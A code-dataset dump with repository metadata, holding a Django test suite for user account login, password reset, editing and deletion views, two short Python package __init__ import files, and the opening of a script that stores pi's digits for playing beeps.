Python
|
tests/test_logic.py
|
GDGSNF/My-Business
|
792bb13a5b296260e5de7e03fba6445a13922851
|
[
"MIT"
] | 21
|
2020-08-29T14:32:13.000Z
|
2021-08-28T21:40:32.000Z
|
tests/test_logic.py
|
GDGSNF/My-Business
|
792bb13a5b296260e5de7e03fba6445a13922851
|
[
"MIT"
] | 1
|
2020-10-11T21:56:15.000Z
|
2020-10-11T21:56:15.000Z
|
tests/test_logic.py
|
GDGSNF/My-Business
|
792bb13a5b296260e5de7e03fba6445a13922851
|
[
"MIT"
] | 5
|
2020-09-08T00:38:11.000Z
|
2021-04-14T11:17:03.000Z
|
from django.contrib.auth.tokens import default_token_generator as token_generator
from django.test import TestCase
from django.utils.encoding import force_bytes
from django.utils.http import urlsafe_base64_encode
from accounts.models import Account
class AccountsLoginTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_template(self):
"""Check login template"""
response = self.client.get("/accounts/login/", follow=True)
self.assertTemplateUsed(response, template_name="accounts/login.html")
def test_successful(self):
"""Check login successful"""
response = self.client.post(
"/accounts/login/",
{"email": self.user.email, "password": "test_user123"},
follow=True,
)
self.assertContains(
response,
f"Welcome back, {self.user.first_name}! You have successfully logged in.",
)
self.client.logout()
response = self.client.post(
"/accounts/login/",
{"email": self.superuser.email, "password": "test_superuser123"},
follow=True,
)
self.assertContains(
response,
f"Welcome back, {self.superuser.first_name}! You have successfully logged in.",
)
def test_incorrect_active(self):
"""Check login unsuccessful (is_active)"""
self.user.is_active = False
self.superuser.is_active = False
self.user.save()
self.superuser.save()
response = self.client.post(
"/accounts/login/",
{"email": self.user.email, "password": "test_user123"},
follow=True,
)
self.assertContains(response, "Your account has not been activated.")
response = self.client.post(
"/accounts/login/",
{"email": self.superuser.email, "password": "test_superuser123"},
follow=True,
)
self.assertContains(response, "Your account has not been activated.")
def test_incorrect_email(self):
"""Check login unsuccessful (email)"""
response = self.client.post(
"/accounts/login/",
{"email": self.user.email + "1", "password": "test_user123"},
follow=True,
)
self.assertContains(
response, "The email and/or password you entered are incorrect."
)
response = self.client.post(
"/accounts/login/",
{"email": self.superuser.email + "1", "password": "test_superuser123"},
follow=True,
)
self.assertContains(
response, "The email and/or password you entered are incorrect."
)
response = self.client.post(
"/accounts/login/",
{"email": "", "password": "test_superuser123"},
follow=True,
)
self.assertContains(response, "This field is required.")
def test_incorrect_password(self):
"""Check login unsuccessful (password)"""
response = self.client.post(
"/accounts/login/",
{"email": self.user.email, "password": "test_user12345"},
follow=True,
)
self.assertContains(
response, "The email and/or password you entered are incorrect."
)
response = self.client.post(
"/accounts/login/", {"email": self.user.email, "password": ""}, follow=True,
)
self.assertContains(response, "This field is required.")
response = self.client.post(
"/accounts/login/",
{"email": self.superuser.email, "password": "test_superuser12345"},
follow=True,
)
self.assertContains(
response, "The email and/or password you entered are incorrect."
)
response = self.client.post(
"/accounts/login/",
{"email": self.superuser.email, "password": ""},
follow=True,
)
self.assertContains(response, "This field is required.")
def test_already_logged_in(self):
"""Check login unsuccessful (logged in)"""
self.client.force_login(self.user)
response = self.client.get("/accounts/login/", follow=True)
self.assertContains(response, "You are already logged in!")
self.client.force_login(self.superuser)
response = self.client.get("/accounts/login/", follow=True)
class AccountsLogoutTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_successful(self):
"""Check logout successful"""
self.client.force_login(self.user)
response = self.client.get("/accounts/logout/", follow=True)
self.assertContains(response, "You have successfully logged out.")
self.client.force_login(self.superuser)
response = self.client.get("/accounts/logout/", follow=True)
self.assertContains(response, "You have successfully logged out.")
def test_warning(self):
"""Check logout successful (warning)"""
response = self.client.get("/accounts/logout/", follow=True)
self.assertContains(response, "You are already logged out!")
class AccountsPasswordResetTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_template(self):
"""Check password reset template"""
response = self.client.get("/accounts/password/reset/", follow=True)
self.assertTemplateUsed(response, template_name="accounts/password/reset.html")
def test_successful(self):
"""Check password reset successful"""
response = self.client.post(
"/accounts/password/reset/", {"email": self.user.email}, follow=True
)
self.assertContains(
response, "You have successfully requested a password reset."
)
response = self.client.post(
"/accounts/password/reset/", {"email": self.superuser.email}, follow=True
)
self.assertContains(
response, "You have successfully requested a password reset."
)
def test_redirect(self):
"""Check password reset redirect"""
self.client.force_login(self.user)
response = self.client.get(f"/accounts/password/reset/", follow=True)
self.assertContains(
response,
"You have been redirected to change your password because you are logged in!",
)
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/password/reset/", follow=True)
self.assertContains(
response,
"You have been redirected to change your password because you are logged in!",
)
def test_incorrect_email(self):
"""Check password reset unsuccessful (email)"""
response = self.client.post(
"/accounts/password/reset/", {"email": ""}, follow=True
)
self.assertContains(response, "This field is required.")
response = self.client.post(
"/accounts/password/reset/",
{"email": "stefan.business@example.com"},
follow=True,
)
self.assertContains(
response, "The email is not associated with any active accounts."
)
class AccountsPasswordResetConfirmTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_template(self):
"""Check password reset confirm template"""
response = self.client.get(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.user.uid))}/{token_generator.make_token(self.user)}/",
follow=True,
)
self.assertTemplateUsed(response, template_name="accounts/password/reset.html")
def test_valid(self):
"""Check password reset confirm valid"""
response = self.client.get(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.user.uid))}/{token_generator.make_token(self.user)}/",
follow=True,
)
self.assertContains(response, "Verify New Password")
response = self.client.get(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.superuser.uid))}/{token_generator.make_token(self.superuser)}/",
follow=True,
)
self.assertContains(response, "Verify New Password")
def test_successful(self):
"""Check password reset confirm successful"""
response = self.client.post(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.user.uid))}/{token_generator.make_token(self.user)}/",
{
"new_password": "test_password123",
"verify_new_password": "test_password123",
},
follow=True,
)
self.assertContains(response, "You have successfully reset your password.")
self.client.login(email=self.user.email, password="test_password123")
self.client.logout()
response = self.client.post(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.superuser.uid))}/{token_generator.make_token(self.superuser)}/",
{
"new_password": "test_password123",
"verify_new_password": "test_password123",
},
follow=True,
)
self.assertContains(response, "You have successfully reset your password.")
self.client.login(email=self.superuser.email, password="test_password123")
def test_redirect(self):
"""Check password reset confirm redirect"""
self.client.force_login(self.user)
response = self.client.get(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.user.uid))}/{token_generator.make_token(self.user)}/",
follow=True,
)
self.assertContains(
response,
"You have been redirected to change your password because you are logged in!",
)
self.client.force_login(self.superuser)
response = self.client.get(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.superuser.uid))}/{token_generator.make_token(self.superuser)}/",
follow=True,
)
self.assertContains(
response,
"You have been redirected to change your password because you are logged in!",
)
def test_incorrect_password(self):
"""Check password reset confirm unsuccessful (incorrect)"""
response = self.client.post(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.user.uid))}/{token_generator.make_token(self.user)}/",
{
"new_password": "test_password123",
"verify_new_password": "test_password",
},
follow=True,
)
self.assertContains(response, "The passwords do not match.")
response = self.client.post(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.user.uid))}/{token_generator.make_token(self.user)}/",
{"new_password": "", "verify_new_password": ""},
follow=True,
)
self.assertContains(response, "This field is required.")
response = self.client.post(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.user.uid))}/{token_generator.make_token(self.user)}/",
{"new_password": "test_password", "verify_new_password": "test_password"},
follow=True,
)
self.assertContains(
response,
"The password needs to have at least 8 characters, a letter, and a number.",
)
def test_incorrect_token(self):
"""Check password reset confirm unsuccessful (token)"""
response = self.client.get(
f"/accounts/password/reset/MA245/{token_generator.make_token(self.user)}/",
follow=True,
)
self.assertContains(response, "The request is invalid.")
response = self.client.get(
f"/accounts/password/reset/{urlsafe_base64_encode(force_bytes(self.user.uid))}/123412/",
follow=True,
)
self.assertContains(response, "The request is invalid.")
class AccountsPasswordChangeTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_template(self):
"""Check password change template"""
self.client.force_login(self.user)
response = self.client.get(
f"/accounts/{self.user.uid}/password/change/", follow=True
)
self.assertTemplateUsed(response, template_name="accounts/password/change.html")
def test_successful(self):
"""Check password change successful"""
self.client.force_login(self.user)
response = self.client.post(
f"/accounts/{self.user.uid}/password/change/",
{
"new_password": "test_password123",
"verify_new_password": "test_password123",
},
follow=True,
)
self.assertContains(response, "You have successfully changed your password.")
self.client.login(email=self.user.email, password="test_password123")
self.client.force_login(self.superuser)
response = self.client.post(
f"/accounts/{self.superuser.uid}/password/change/",
{
"new_password": "test_password123",
"verify_new_password": "test_password123",
},
follow=True,
)
self.assertContains(response, "You have successfully changed your password.")
self.client.login(email=self.superuser.email, password="test_password123")
def test_incorrect_permissions(self):
"""Check password change unsuccessful (permissions)"""
self.client.force_login(self.user)
response = self.client.get(
f"/accounts/{self.user.uid}/password/change/", follow=True
)
self.assertContains(response, "Verify New Password")
response = self.client.get(
f"/accounts/{self.superuser.uid}/password/change/", follow=True
)
self.assertContains(response, "You don't have the required permissions.")
self.client.force_login(self.superuser)
response = self.client.get(
f"/accounts/{self.user.uid}/password/change/", follow=True
)
self.assertContains(response, "Verify New Password")
response = self.client.get(
f"/accounts/{self.superuser.uid}/password/change/", follow=True
)
self.assertContains(response, "Verify New Password")
def test_incorrect_password(self):
"""Check password change unsuccessful (incorrect)"""
self.client.force_login(self.user)
response = self.client.post(
f"/accounts/{self.user.uid}/password/change/",
{
"new_password": "test_password123",
"verify_new_password": "test_password12345",
},
follow=True,
)
self.assertContains(response, "The passwords do not match.")
response = self.client.post(
f"/accounts/{self.user.uid}/password/change/",
{"new_password": "", "verify_new_password": ""},
follow=True,
)
self.assertContains(response, "This field is required.")
response = self.client.post(
f"/accounts/{self.user.uid}/password/change/",
{"new_password": "test_password", "verify_new_password": "test_password"},
follow=True,
)
self.assertContains(
response,
"The password needs to have at least 8 characters, a letter, and a number.",
)
self.client.force_login(self.superuser)
response = self.client.post(
f"/accounts/{self.superuser.uid}/password/change/",
{
"new_password": "test_password123",
"verify_new_password": "test_password12345",
},
follow=True,
)
self.assertContains(response, "The passwords do not match.")
response = self.client.post(
f"/accounts/{self.superuser.uid}/password/change/",
{"new_password": "", "verify_new_password": ""},
follow=True,
)
self.assertContains(response, "This field is required.")
response = self.client.post(
f"/accounts/{self.superuser.uid}/password/change/",
{"new_password": "test_password", "verify_new_password": "test_password"},
follow=True,
)
self.assertContains(
response,
"The password needs to have at least 8 characters, a letter, and a number.",
)
def test_incorrect_account(self):
"""Check password change unsuccessful (account)"""
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/999999/password/change/", follow=True)
self.assertContains(response, "The account doesn't exist.")
class AccountsListTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_template(self):
"""Check list template"""
self.client.force_login(self.superuser)
response = self.client.get("/accounts/", follow=True)
self.assertTemplateUsed(response, template_name="accounts/list.html")
def test_successful(self):
"""Check list successful"""
self.client.force_login(self.superuser)
response = self.client.get("/accounts/", follow=True)
self.assertContains(response, self.user.uid)
self.assertContains(response, self.user.first_name)
self.assertContains(response, self.user.last_name)
self.assertContains(response, self.user.email)
self.assertContains(response, self.superuser.uid)
self.assertContains(response, self.superuser.first_name)
self.assertContains(response, self.superuser.last_name)
self.assertContains(response, self.superuser.email)
def test_incorrect_permissions(self):
"""Check list unsuccessful (permissions)"""
self.client.force_login(self.user)
response = self.client.get("/accounts/", follow=True)
self.assertContains(response, "You don't have the required permissions.")
class AccountsDetailTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_template(self):
"""Check detail template"""
self.client.force_login(self.user)
response = self.client.get(f"/accounts/{self.user.uid}/", follow=True)
self.assertTemplateUsed(response, template_name="accounts/detail.html")
def test_successful(self):
"""Check detail successful"""
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/{self.user.uid}/", follow=True)
self.assertContains(response, self.user.uid)
self.assertContains(response, self.user.first_name)
self.assertContains(response, self.user.last_name)
self.assertContains(response, self.user.email)
self.assertContains(response, self.user.company)
self.assertContains(response, self.user.address1)
self.assertContains(response, self.user.country.name)
response = self.client.get(f"/accounts/{self.superuser.uid}/", follow=True)
self.assertContains(response, self.superuser.uid)
self.assertContains(response, self.superuser.first_name)
self.assertContains(response, self.superuser.last_name)
self.assertContains(response, self.superuser.email)
def test_incorrect_permissions(self):
"""Check detail unsuccessful (permissions)"""
self.client.force_login(self.user)
response = self.client.get(f"/accounts/{self.user.uid}/", follow=True)
self.assertContains(response, self.user.get_full_name())
response = self.client.get(f"/accounts/{self.superuser.uid}/", follow=True)
self.assertContains(response, "You don't have the required permissions.")
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/{self.superuser.uid}/", follow=True)
self.assertContains(response, self.superuser.get_full_name())
response = self.client.get(f"/accounts/{self.user.uid}/", follow=True)
self.assertContains(response, self.user.get_full_name())
def test_incorrect_account(self):
"""Check detail unsuccessful (account)"""
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/999999/", follow=True)
self.assertContains(response, "The account doesn't exist.")
class AccountsEditTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_template(self):
"""Check edit template"""
self.client.force_login(self.user)
response = self.client.get(f"/accounts/{self.user.uid}/edit/", follow=True)
self.assertTemplateUsed(response, template_name="accounts/edit.html")
def test_date(self):
"""Check edit data"""
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/{self.user.uid}/edit/", follow=True)
self.assertContains(response, self.user.uid)
self.assertContains(response, self.user.first_name)
self.assertContains(response, self.user.last_name)
self.assertContains(response, self.user.email)
self.assertContains(response, self.user.company)
self.assertContains(response, self.user.address1)
self.assertContains(response, self.user.country.code)
response = self.client.get(f"/accounts/{self.superuser.uid}/edit/", follow=True)
self.assertContains(response, self.superuser.uid)
self.assertContains(response, self.superuser.first_name)
self.assertContains(response, self.superuser.last_name)
self.assertContains(response, self.superuser.email)
def test_successful(self):
"""Check edit successful"""
self.client.force_login(self.superuser)
response = self.client.post(
f"/accounts/{self.user.uid}/edit/",
{
"uid": self.user.uid,
"email": self.user.email,
"verify_email": self.user.email,
"first_name": "John",
"last_name": "Smith",
"date_of_birth": "2000-01-01",
},
follow=True,
)
self.assertContains(response, "The account has been successfully edited.")
response = self.client.post(
f"/accounts/{self.superuser.uid}/edit/",
{
"uid": self.superuser.uid,
"email": "John.business@example.com",
"verify_email": "John.business@example.com",
"first_name": "John",
"last_name": "Doe",
"avatar": self.user.avatar_url,
},
follow=True,
)
self.assertContains(response, "The account has been successfully edited.")
def test_incorrect_permissions(self):
"""Check edit unsuccessful (permissions)"""
self.client.force_login(self.user)
response = self.client.get(f"/accounts/{self.user.uid}/edit/", follow=True)
self.assertContains(response, self.user.first_name)
self.assertContains(response, self.user.last_name)
response = self.client.get(f"/accounts/{self.superuser.uid}/edit/", follow=True)
self.assertContains(response, "You don't have the required permissions.")
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/{self.superuser.uid}/edit/", follow=True)
self.assertContains(response, self.superuser.first_name)
self.assertContains(response, self.superuser.last_name)
response = self.client.get(f"/accounts/{self.user.uid}/edit/", follow=True)
self.assertContains(response, self.user.first_name)
self.assertContains(response, self.user.last_name)
def test_incorrect_email(self):
"""Check edit unsuccessful (email)"""
self.client.force_login(self.superuser)
response = self.client.post(
f"/accounts/{self.user.uid}/edit/",
{
"email": self.user.email,
"verify_email": self.user.email + "1",
"first_name": self.user.first_name,
"last_name": self.user.last_name,
},
follow=True,
)
self.assertContains(response, "The emails do not match.")
self.client.force_login(self.superuser)
response = self.client.post(
f"/accounts/{self.user.uid}/edit/",
{
"uid": self.user.uid,
"email": "",
"verify_email": "",
"last_name": self.user.first_name,
"first_name": self.user.last_name,
},
follow=True,
)
self.assertContains(response, "This field is required.")
def test_incorrect_first_name(self):
"""Check edit unsuccessful (first name)"""
self.client.force_login(self.superuser)
response = self.client.post(
f"/accounts/{self.user.uid}/edit/",
{
"email": self.user.email,
"verify_email": self.user.email,
"first_name": "!^$&#(1234",
"last_name": self.user.last_name,
},
follow=True,
)
self.assertContains(response, "Enter a valid first name.")
def test_incorrect_last_name(self):
"""Check edit unsuccessful (last name)"""
self.client.force_login(self.superuser)
response = self.client.post(
f"/accounts/{self.user.uid}/edit/",
{
"email": self.user.email,
"verify_email": self.user.email,
"first_name": self.user.first_name,
"last_name": "!^$&#(1234",
},
follow=True,
)
self.assertContains(response, "Enter a valid last name.")
def test_incorrect_date_of_birth(self):
"""Check edit unsuccessful (date of birth)"""
self.client.force_login(self.superuser)
response = self.client.post(
f"/accounts/{self.user.uid}/edit/",
{
"email": self.user.email,
"verify_email": self.user.email,
"first_name": self.user.first_name,
"last_name": self.user.last_name,
"date_of_birth": "3000-01-01",
},
follow=True,
)
self.assertContains(response, "The date of birth cannot be in the future.")
def test_incorrect_account(self):
"""Check edit unsuccessful (account)"""
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/999999/edit/", follow=True)
self.assertContains(response, "The account doesn't exist.")
class AccountsDeleteTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_template(self):
"""Check delete template"""
self.client.force_login(self.user)
response = self.client.get(f"/accounts/{self.user.uid}/delete/", follow=True)
self.assertTemplateUsed(response, template_name="accounts/delete.html")
def test_successful(self):
"""Check delete successful"""
self.client.force_login(self.superuser)
response = self.client.post(f"/accounts/{self.user.uid}/delete/", follow=True)
self.assertContains(response, "The account has been deleted.")
def test_permissions_non_superuser(self):
"""Check delete unsuccessful (permissions)"""
self.client.force_login(self.user)
response = self.client.get(f"/accounts/{self.user.uid}/delete/", follow=True)
self.assertContains(response, "Delete")
response = self.client.get(
f"/accounts/{self.superuser.uid}/delete/", follow=True
)
self.assertContains(response, "You don't have the required permissions.")
self.client.force_login(self.superuser)
response = self.client.get(
f"/accounts/{self.superuser.uid}/delete/", follow=True
)
self.assertContains(response, "Delete")
response = self.client.get(f"/accounts/{self.user.uid}/delete/", follow=True)
self.assertContains(response, "Delete")
def test_incorrect_account(self):
"""Check delete unsuccessful (account)"""
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/999999/delete/", follow=True)
self.assertContains(response, "The account doesn't exist.")
| 42.165527
| 143
| 0.622327
| 3,337
| 30,823
| 5.643392
| 0.052442
| 0.0685
| 0.140824
| 0.110025
| 0.92826
| 0.908666
| 0.87946
| 0.857052
| 0.830076
| 0.805119
| 0
| 0.008345
| 0.249619
| 30,823
| 730
| 144
| 42.223288
| 0.805871
| 0.051293
| 0
| 0.707921
| 0
| 0.016502
| 0.274697
| 0.131017
| 0
| 0
| 0
| 0
| 0.181518
| 1
| 0.085809
| false
| 0.168317
| 0.008251
| 0
| 0.123762
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
04b431ed286408a33c87e5de5fbb49cd2d958c27
| 238
|
py
|
Python
|
textattack/goal_function_results/__init__.py
|
k-ivey/TextAttack
|
47d15acea90bf92e6a7f19200a59da29e74731e6
|
[
"MIT"
] | 2
|
2021-02-22T12:15:27.000Z
|
2021-05-02T15:22:05.000Z
|
textattack/goal_function_results/__init__.py
|
k-ivey/TextAttack
|
47d15acea90bf92e6a7f19200a59da29e74731e6
|
[
"MIT"
] | null | null | null |
textattack/goal_function_results/__init__.py
|
k-ivey/TextAttack
|
47d15acea90bf92e6a7f19200a59da29e74731e6
|
[
"MIT"
] | null | null | null |
from .goal_function_result import GoalFunctionResult, GoalFunctionResultStatus
from .classification_goal_function_result import ClassificationGoalFunctionResult
from .text_to_text_goal_function_result import TextToTextGoalFunctionResult
| 47.6
| 81
| 0.92437
| 23
| 238
| 9.130435
| 0.521739
| 0.171429
| 0.257143
| 0.342857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 238
| 4
| 82
| 59.5
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
04c396e919649917ce01156e0beac8338cb3d1fd
| 120
|
py
|
Python
|
gym_tictactoe_np/agents/__init__.py
|
IshanManchanda/gym-3d-tictactoe-np
|
b1788deeb8b1dd3e79ef78f996969e2d71dd3a39
|
[
"MIT"
] | 1
|
2021-10-05T13:09:11.000Z
|
2021-10-05T13:09:11.000Z
|
gym_tictactoe_np/agents/__init__.py
|
IshanManchanda/gym-tictactoe-np
|
b1788deeb8b1dd3e79ef78f996969e2d71dd3a39
|
[
"MIT"
] | null | null | null |
gym_tictactoe_np/agents/__init__.py
|
IshanManchanda/gym-tictactoe-np
|
b1788deeb8b1dd3e79ef78f996969e2d71dd3a39
|
[
"MIT"
] | null | null | null |
from gym_tictactoe_np.agents.agent_human import HumanAgent
from gym_tictactoe_np.agents.agent_random import RandomAgent
| 40
| 60
| 0.9
| 18
| 120
| 5.666667
| 0.611111
| 0.137255
| 0.313725
| 0.352941
| 0.568627
| 0.568627
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 120
| 2
| 61
| 60
| 0.910714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
04ffb707df585f417ad260feac2b93e51dfd04e4
| 102,580
|
py
|
Python
|
pi beat.py
|
flyinghippopotamus314159/Music-player
|
b7dfcfd1a07a7a4fc494777d459ca5636b798bc2
|
[
"MIT"
] | null | null | null |
pi beat.py
|
flyinghippopotamus314159/Music-player
|
b7dfcfd1a07a7a4fc494777d459ca5636b798bc2
|
[
"MIT"
] | null | null | null |
pi beat.py
|
flyinghippopotamus314159/Music-player
|
b7dfcfd1a07a7a4fc494777d459ca5636b798bc2
|
[
"MIT"
] | null | null | null |
import winsound, time
start=input("Press enter to start playing pi")
time.sleep(10)
pi='31415926535897932384626433832795028841971693993751058209749445923078164062862089986280348253421170679821480865132823066470938446095505822317253594081284811174502841027019385211055596446229489549303819644288109756659334461284756482337867831652712019091456485669234603486104543266482133936072602491412737245870066063155881748815209209628292540917153643678925903600113305305488204665213841469519415116094330572703657595919530921861173819326117931051185480744623799627495673518857527248912279381830119491298336733624406566430860213949463952247371907021798609437027705392171762931767523846748184676694051320005681271452635608277857713427577896091736371787214684409012249534301465495853710507922796892589235420199561121290219608640344181598136297747713099605187072113499999983729780499510597317328160963185950244594553469083026425223082533446850352619311881710100031378387528865875332083814206171776691473035982534904287554687311595628638823537875937519577818577805321712268066130019278766111959092164201989380952572010654858632788659361533818279682303019520353018529689957736225994138912497217752834791315155748572424541506959508295331168617278558890750983817546374649393192550604009277016711390098488240128583616035637076601047101819429555961989467678374494482553797747268471040475346462080466842590694912933136770289891521047521620569660240580381501935112533824300355876402474964732639141992726042699227967823547816360093417216412199245863150302861829745557067498385054945885869269956909272107975093029553211653449872027559602364806654991198818347977535663698074265425278625518184175746728909777727938000816470600161452491921732172147723501414419735685481613611573525521334757418494684385233239073941433345477624168625189835694855620992192221842725502542568876717904946016534668049886272327917860857843838279679766814541009538837863609506800642251252051173929848960841284886269456042419652850222106611863067442786220391949450471237137869609563643719172874677646575739624138908658326459958133904780275900994657640789512694683983525957098258226205224894077267194782684826014769909026401363944374553050682034962524517493996514314298091906592509372216964615157098583874105978859597729754989301617539284681382686838689427741559918559252459539594310499725246808459872736446958486538367362226260991246080512438843904512441365497627807977156914359977001296160894416948685558484063534220722258284886481584560285060168427394522674676788952521385225499546667278239864565961163548862305774564980355936345681743241125150760694794510965960940252288797108931456691368672287489405601015033086179286809208747609178249385890097149096759852613655497818931297848216829989487226588048575640142704775551323796414515237462343645428584447952658678210511413547357395231134271661021359695362314429524849371871101457654035902799344037420073105785390621983874478084784896833214457138687519435064302184531910484810053706146806749192781911979399520614196634287544406437451237181921799983910159195618146751426912397489409071864942319615679452080951465502252316038819301420937621378559566389377870830390697920773467221825625996615014215030680384477345492026054146659252014974428507325186660021324340881907104863317346496514539057962685610055081066587969981635747363840525714591028970641401109712062804390397595156771577004203378699360072305587631763594218731251471205329281918261861258673215791984148488291644706095752706957220917567116722910981690915280173506712748583222871835209353965725121083579151369882091444210067510334671103141267111369908658516398315019701651511685171437657618351556508849099898599823873455283316355076479185358932261854896321329330898570642046752590709154814165498594616371802709819943099244889575712828905923233260972997120844335732654893823911932597463667305836041428138830320382490375898524374417029132765618093773444030707469211201913020330380197621101100449293215160842444859637669838952286847831235526582131449576857262433441893039686426243410773226978028073189154411010446823252716201052652272111660396665573092547110557853763466820653109896526918620564769312570586356620185581007293606598764861179104533488503461136576867532494416680396265797877185560845529654126654085306143444318586769751456614068007002378776591344017127494704205622305389945613140711270004078547332699390814546646458807972708266830634328587856983052358089330657574067954571637752542021149557615814002501262285941302164715509792592309907965473761255176567513575178296664547791745011299614890304639947132962107340437518957359614589019389713111790429782856475032031986915140287080859904801094121472213179476477726224142548545403321571853061422881375850430633217518297986622371721591607716692547487389866549494501146540628433663937900397692656721463853067360965712091807638327166416274888800786925602902284721040317211860820419000422966171196377921337575114959501566049631862947265473642523081770367515906735023507283540567040386743513622224771589150495309844489333096340878076932599397805419341447377441842631298608099888687413260472156951623965864573021631598193195167353812974167729478672422924654366800980676928238280689964004824354037014163149658979409243237896907069779422362508221688957383798623001593776471651228935786015881617557829735233446042815126272037343146531977774160319906655418763979293344195215413418994854447345673831624993419131814809277771038638773431772075456545322077709212019051660962804909263601975988281613323166636528619326686336062735676303544776280350450777235547105859548702790814356240145171806246436267945612753181340783303362542327839449753824372058353114771199260638133467768796959703098339130771098704085913374641442822772634659470474587847787201927715280731767907707157213444730605700733492436931138350493163128404251219256517980694113528013147013047816437885185290928545201165839341965621349143415956258658655705526904965209858033850722426482939728584783163057777560688876446248246857926039535277348030480290058760758251047470916439613626760449256274204208320856611906254543372131535958450687724602901618766795240616342522577195429162991930645537799140373404328752628889639958794757291746426357455254079091451357111369410911939325191076020825202618798531887705842972591677813149699009019211697173727847684726860849003377024242916513005005168323364350389517029893922334517220138128069650117844087451960121228599371623130171144484640903890644954440061986907548516026327505298349187407866808818338510228334508504860825039302133219715518430635455007668282949304137765527939751754613953984683393638304746119966538581538420568533862186725233402830871123282789212507712629463229563989898935821167456270102183564622013496715188190973038119800497340723961036854066431939509790190699639552453005450580685501956730229219139339185680344903982059551002263535361920419947455385938102343955449597783779023742161727111723643435439478221818528624085140066604433258885698670543154706965747458550332323342107301545940516553790686627333799585115625784322988273723198987571415957811196358330059408730681216028764962867446047746491599505497374256269010490377819868359381465741268049256487985561453723478673303904688383436346553794986419270563872931748723320837601123029911367938627089438799362016295154133714248928307220126901475466847653576164773794675200490757155527819653621323926406160136358155907422020203187277605277219005561484255518792530343513984425322341576233610642506390497500865627109535919465897514131034822769306247435363256916078154781811528436679570611086153315044521274739245449454236828860613408414863776700961207151249140430272538607648236341433462351897576645216413767969031495019108575984423919862916421939949072362346468441173940326591840443780513338945257423995082965912285085558215725031071257012668302402929525220118726767562204154205161841634847565169998116141010029960783869092916030288400269104140792886215078424516709087000699282120660418371806535567252532567532861291042487761825829765157959847035622262934860034158722980534989650226291748788202734209222245339856264766914905562842503912757710284027998066365825488926488025456610172967026640765590429099456815065265305371829412703369313785178609040708667114965583434347693385781711386455873678123014587687126603